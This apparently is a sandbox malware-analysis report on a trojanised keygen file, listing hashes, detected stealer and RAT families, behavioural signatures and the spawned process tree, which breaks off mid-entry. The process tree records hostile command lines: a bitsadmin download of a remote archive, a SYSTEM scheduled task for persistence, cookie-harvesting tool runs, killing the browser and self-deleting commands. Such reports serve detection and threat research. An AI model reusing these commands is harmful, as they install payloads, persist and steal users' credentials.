Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    269s
  • max time network
    1506s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-05-2021 06:58

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 40 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1376
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1352
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1180
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
          1⤵
            PID:1172
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
            1⤵
            • Drops file in System32 directory
            PID:344
            • C:\Users\Admin\AppData\Roaming\gwedvfv
              C:\Users\Admin\AppData\Roaming\gwedvfv
              2⤵
                PID:5760
                • C:\Users\Admin\AppData\Roaming\gwedvfv
                  C:\Users\Admin\AppData\Roaming\gwedvfv
                  3⤵
                    PID:4068
                • C:\Users\Admin\AppData\Roaming\gwedvfv
                  C:\Users\Admin\AppData\Roaming\gwedvfv
                  2⤵
                    PID:5176
                    • C:\Users\Admin\AppData\Roaming\gwedvfv
                      C:\Users\Admin\AppData\Roaming\gwedvfv
                      3⤵
                        PID:3884
                    • C:\Users\Admin\AppData\Roaming\gwedvfv
                      C:\Users\Admin\AppData\Roaming\gwedvfv
                      2⤵
                        PID:1072
                        • C:\Users\Admin\AppData\Roaming\gwedvfv
                          C:\Users\Admin\AppData\Roaming\gwedvfv
                          3⤵
                            PID:5608
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:996
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                          1⤵
                            PID:2856
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                            1⤵
                              PID:2804
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                              1⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2796
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                              1⤵
                                PID:2540
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                1⤵
                                  PID:2504
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                  1⤵
                                    PID:1964
                                  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                                    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                                    1⤵
                                    • Checks computer location settings
                                    • Suspicious use of WriteProcessMemory
                                    PID:3156
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:2772
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        3⤵
                                        • Loads dropped DLL
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2780
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2824
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:196
                                      • C:\Users\Admin\AppData\Local\Temp\is-T6BG3.tmp\Install.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-T6BG3.tmp\Install.tmp" /SL5="$60054,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of WriteProcessMemory
                                        PID:3792
                                        • C:\Users\Admin\AppData\Local\Temp\is-89O2T.tmp\Ultra.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-89O2T.tmp\Ultra.exe" /S /UID=burnerch1
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2844
                                          • C:\Users\Admin\AppData\Local\Temp\07-0d50b-1c2-9f795-a7d1f16f908e9\Turybasepa.exe
                                            "C:\Users\Admin\AppData\Local\Temp\07-0d50b-1c2-9f795-a7d1f16f908e9\Turybasepa.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4468
                                          • C:\Users\Admin\AppData\Local\Temp\d0-a3d35-ea5-50a9e-3db3cff4d0b0d\ZHeqacuvubi.exe
                                            "C:\Users\Admin\AppData\Local\Temp\d0-a3d35-ea5-50a9e-3db3cff4d0b0d\ZHeqacuvubi.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:4512
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hzmo1xg.yla\KiffMainE1.exe & exit
                                              6⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3888
                                              • C:\Users\Admin\AppData\Local\Temp\4hzmo1xg.yla\KiffMainE1.exe
                                                C:\Users\Admin\AppData\Local\Temp\4hzmo1xg.yla\KiffMainE1.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5096
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ks3eta0s.3iv\001.exe & exit
                                              6⤵
                                                PID:4644
                                                • C:\Users\Admin\AppData\Local\Temp\ks3eta0s.3iv\001.exe
                                                  C:\Users\Admin\AppData\Local\Temp\ks3eta0s.3iv\001.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4288
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\urp2q4u3.121\installer.exe /qn CAMPAIGN="654" & exit
                                                6⤵
                                                  PID:4336
                                                  • C:\Users\Admin\AppData\Local\Temp\urp2q4u3.121\installer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\urp2q4u3.121\installer.exe /qn CAMPAIGN="654"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:1936
                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\urp2q4u3.121\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\urp2q4u3.121\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620025277 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                      8⤵
                                                        PID:4372
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5fyq4pg.ztr\gpooe.exe & exit
                                                    6⤵
                                                      PID:4424
                                                      • C:\Users\Admin\AppData\Local\Temp\d5fyq4pg.ztr\gpooe.exe
                                                        C:\Users\Admin\AppData\Local\Temp\d5fyq4pg.ztr\gpooe.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4644
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:4732
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          8⤵
                                                            PID:4896
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            8⤵
                                                              PID:3476
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              8⤵
                                                                PID:1924
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s1ii0cpd.2y2\google-game.exe & exit
                                                            6⤵
                                                              PID:5056
                                                              • C:\Users\Admin\AppData\Local\Temp\s1ii0cpd.2y2\google-game.exe
                                                                C:\Users\Admin\AppData\Local\Temp\s1ii0cpd.2y2\google-game.exe
                                                                7⤵
                                                                  PID:5352
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                    8⤵
                                                                      PID:5480
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5cywgify.rdx\huesaa.exe & exit
                                                                  6⤵
                                                                    PID:5204
                                                                    • C:\Users\Admin\AppData\Local\Temp\5cywgify.rdx\huesaa.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\5cywgify.rdx\huesaa.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:5544
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:6116
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:5944
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                          PID:4476
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          8⤵
                                                                            PID:3012
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1ps0ppr.equ\askinstall39.exe & exit
                                                                        6⤵
                                                                          PID:5568
                                                                          • C:\Users\Admin\AppData\Local\Temp\j1ps0ppr.equ\askinstall39.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\j1ps0ppr.equ\askinstall39.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:5472
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:4896
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im chrome.exe
                                                                                9⤵
                                                                                • Kills process with taskkill
                                                                                PID:5828
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5nmfgy2x.vgz\setup.exe & exit
                                                                          6⤵
                                                                            PID:5852
                                                                            • C:\Users\Admin\AppData\Local\Temp\5nmfgy2x.vgz\setup.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\5nmfgy2x.vgz\setup.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:2316
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\5nmfgy2x.vgz\setup.exe"
                                                                                8⤵
                                                                                  PID:2680
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                    9⤵
                                                                                    • Runs ping.exe
                                                                                    PID:5808
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dauzarzz.ooe\y1.exe & exit
                                                                              6⤵
                                                                                PID:6056
                                                                                • C:\Users\Admin\AppData\Local\Temp\dauzarzz.ooe\y1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\dauzarzz.ooe\y1.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:3152
                                                                                  • C:\Users\Admin\AppData\Local\Temp\ZRZHQQFSi2.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\ZRZHQQFSi2.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    PID:900
                                                                                    • C:\Users\Admin\AppData\Roaming\1620284662834.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\1620284662834.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620284662834.txt"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5820
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\ZRZHQQFSi2.exe"
                                                                                      9⤵
                                                                                        PID:5436
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1 -n 3
                                                                                          10⤵
                                                                                          • Runs ping.exe
                                                                                          PID:2124
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\dauzarzz.ooe\y1.exe"
                                                                                      8⤵
                                                                                        PID:3868
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /T 10 /NOBREAK
                                                                                          9⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5960
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zp4lgydm.lml\Setup_v3.exe & exit
                                                                                    6⤵
                                                                                      PID:5404
                                                                                      • C:\Users\Admin\AppData\Local\Temp\zp4lgydm.lml\Setup_v3.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\zp4lgydm.lml\Setup_v3.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2196
                                                                                        • C:\Windows\SysWOW64\at.exe
                                                                                          "C:\Windows\System32\at.exe"
                                                                                          8⤵
                                                                                            PID:4240
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                                                            8⤵
                                                                                              PID:1232
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\System32\cmd.exe
                                                                                                9⤵
                                                                                                  PID:5276
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                                                    10⤵
                                                                                                      PID:4800
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                                      Fessura.exe.com Z
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5156
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                                                        11⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5296
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                                                          12⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:648
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                          12⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5668
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                          12⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks computer location settings
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          • Modifies registry class
                                                                                                          PID:4452
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                          12⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1492
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping 127.0.0.1 -n 30
                                                                                                      10⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Runs ping.exe
                                                                                                      PID:5480
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                                                  8⤵
                                                                                                    PID:5756
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hn4xopp4.gpo\toolspab1.exe & exit
                                                                                                6⤵
                                                                                                  PID:4220
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\hn4xopp4.gpo\toolspab1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\hn4xopp4.gpo\toolspab1.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5832
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\hn4xopp4.gpo\toolspab1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\hn4xopp4.gpo\toolspab1.exe
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5928
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ldz2fpbp.gcv\005.exe & exit
                                                                                                  6⤵
                                                                                                    PID:5048
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ldz2fpbp.gcv\005.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\ldz2fpbp.gcv\005.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5076
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ihfr1r41.tl0\SunLabsPlayer.exe /S & exit
                                                                                                    6⤵
                                                                                                      PID:4992
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ihfr1r41.tl0\SunLabsPlayer.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\ihfr1r41.tl0\SunLabsPlayer.exe /S
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:4860
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:5812
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:5652
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:4528
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:5772
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:5600
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:4488
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                      • Checks for any installed AV software in registry
                                                                                                                      PID:4404
                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                      8⤵
                                                                                                                      • Download via BitsAdmin
                                                                                                                      PID:2780
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p9UiKUpbRlSaJBYc -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5484
                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4396
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:4340
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          9⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:4336
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                        8⤵
                                                                                                                          PID:5500
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshFD63.tmp\tempfile.ps1"
                                                                                                                          8⤵
                                                                                                                            PID:4536
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
